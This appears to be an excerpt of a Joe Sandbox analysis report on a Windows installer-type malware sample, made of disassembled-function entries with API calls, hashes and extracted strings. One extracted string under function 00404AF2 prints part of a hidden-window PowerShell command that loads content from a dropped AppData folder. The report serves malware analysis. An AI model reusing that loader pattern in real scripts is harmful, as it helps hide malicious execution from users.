                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileString
                                                      • String ID:
                                                      • API String ID: 1096422788-0
                                                      • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                      • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                      • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                      • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004064EF Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040657D,?,?,?,?,: Completed,?,00000000), ref: 00406513
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                      • Instruction ID: 600eba3f25fec8fd2e0e76c9bf818d2d921b30b98e1649e5cb913c6f6c6f8cb9
                                                      • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                      • Instruction Fuzzy Hash: 4DD0123600020DBBDF115E90ED01FAB3B5DAB08714F014826FE06A4091D775D530AB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040464D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: bbff93e8e7b6fbbde5b3e6835961aabe87c2407351212feb15be82645ba7347e
                                                      • Instruction ID: 8da91bbb186c2144be8ade9eda525c6e960391099661206c99069da2b113483a
                                                      • Opcode Fuzzy Hash: bbff93e8e7b6fbbde5b3e6835961aabe87c2407351212feb15be82645ba7347e
                                                      • Instruction Fuzzy Hash: 8AC04C717402007BDA209B609E49F0777545790740F1448397241E50E0DA75E450DA1C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404636 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 7b4bfb7d8a9e2d5081e5309f0fc6290f036d11fbecd93854b33ee848cd02fe6a
                                                      • Instruction ID: d5eb2a856a333d3101ae379727e71f2b9456d74e3cdd14bb02a2274a242f0d94
                                                      • Opcode Fuzzy Hash: 7b4bfb7d8a9e2d5081e5309f0fc6290f036d11fbecd93854b33ee848cd02fe6a
                                                      • Instruction Fuzzy Hash: 7DB09235280640AADE215B00DE09F867B66A7A4701F008438B240640B0CAB204A1DB08
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004035FD Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                      • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                      • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                      • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404623 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(?,004043FA), ref: 0040462D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: a1d13c5b68b43feb2506ad2660f88dc7f5461ef8ac70b9f67d62976f64309ddb
                                                      • Instruction ID: 1e4f5f38d13ad7c97f33cdc532a4b6885827051f8054e7174c13f2a159251e9b
                                                      • Opcode Fuzzy Hash: a1d13c5b68b43feb2506ad2660f88dc7f5461ef8ac70b9f67d62976f64309ddb
                                                      • Instruction Fuzzy Hash: 7FA00176544900ABCA16AB50EF0980ABB72BBA8701B5288B9A285610348BB25821FB19
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                        • Part of subcall function 00405707: lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
                                                        • Part of subcall function 00405707: SetWindowTextW.USER32(Completed,Completed), ref: 00405774
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                        • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                        • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                        • Part of subcall function 00406B21: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B32
                                                        • Part of subcall function 00406B21: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B54
                                                        • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                      • String ID:
                                                      • API String ID: 2972824698-0
                                                      • Opcode ID: 26d50f179d8fc8cde647217e16b8c843d809a43f18d9577a6fed63db6197872c
                                                      • Instruction ID: ba3ed7a1875ec382e1b93905bcfefb33a8222a1057eccf936486356e32fab672
                                                      • Opcode Fuzzy Hash: 26d50f179d8fc8cde647217e16b8c843d809a43f18d9577a6fed63db6197872c
                                                      • Instruction Fuzzy Hash: 48F06D32905125EBDB20BBE599C59DE76F59B00318F25413FE102B21E1CB7C4E459A6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00404AF2 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 275stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404B41
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00404B6B
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404C1C
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404C27
                                                      • lstrcmpiW.KERNEL32(: Completed,00422F48,00000000,?,?), ref: 00404C59
                                                      • lstrcatW.KERNEL32(?,: Completed), ref: 00404C65
                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C77
                                                        • Part of subcall function 00405CC6: GetDlgItemTextW.USER32(?,?,00000400,00404CAE), ref: 00405CD9
                                                        • Part of subcall function 00406930: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                        • Part of subcall function 00406930: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                        • Part of subcall function 00406930: CharNextW.USER32(?,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                        • Part of subcall function 00406930: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                      • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,00000001,00420F18,?,?,000003FB,?), ref: 00404D3A
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D55
                                                        • Part of subcall function 00404EAE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                        • Part of subcall function 00404EAE: wsprintfW.USER32 ref: 00404F58
                                                        • Part of subcall function 00404EAE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                      Strings
                                                      • H/B, xrefs: 00404BEF
                                                      • "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl, xrefs: 00404B0B
                                                      • m, xrefs: 00404AF8
                                                      • : Completed, xrefs: 00404C53, 00404C58, 00404C63
                                                      • C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238, xrefs: 00404C42
                                                      • A, xrefs: 00404C15
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl$: Completed$A$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238$H/B$m
                                                      • API String ID: 2624150263-3641959131
                                                      • Opcode ID: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                      • Instruction ID: 96009b05525636a0bc85a96efb184481c484ec56fefee2337862baa2afa4bf02
                                                      • Opcode Fuzzy Hash: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                      • Instruction Fuzzy Hash: DDA173B1900209ABDB11AFA5CD45AEFB7B8EF84314F11843BF601B62D1D77C99418B6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                      Strings
                                                      • C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151, xrefs: 0040226E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CreateInstance
                                                      • String ID: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151
                                                      • API String ID: 542301482-1983529546
                                                      • Opcode ID: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                      • Instruction ID: 6031f0b9305bb7b05064ab4f17c9904609ff1c452577966f293784d012f03e0b
                                                      • Opcode Fuzzy Hash: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                      • Instruction Fuzzy Hash: 4A410475A00209AFCB40DFE4C989EAD7BB5BF48308B20457EF505EB2D1DB799982CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                      • Instruction ID: f0d7266373870d470beff65cac24d35b4a218527411e0b80208e5fb1e93adf0c
                                                      • Opcode Fuzzy Hash: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                      • Instruction Fuzzy Hash: 28F08271A04104AED701EBE4ED499AEB378EF14314F60057BE111F31E0D7B84E059B19
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040506E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00405086
                                                      • GetDlgItem.USER32(?,00000408), ref: 00405091
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004050DB
                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050F2
                                                      • SetWindowLongW.USER32(?,000000FC,0040567B), ref: 0040510B
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040511F
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405131
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00405147
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405153
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405165
                                                      • DeleteObject.GDI32(00000000), ref: 00405168
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405193
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040519F
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040523A
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040526A
                                                        • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040527E
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004052AC
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052BA
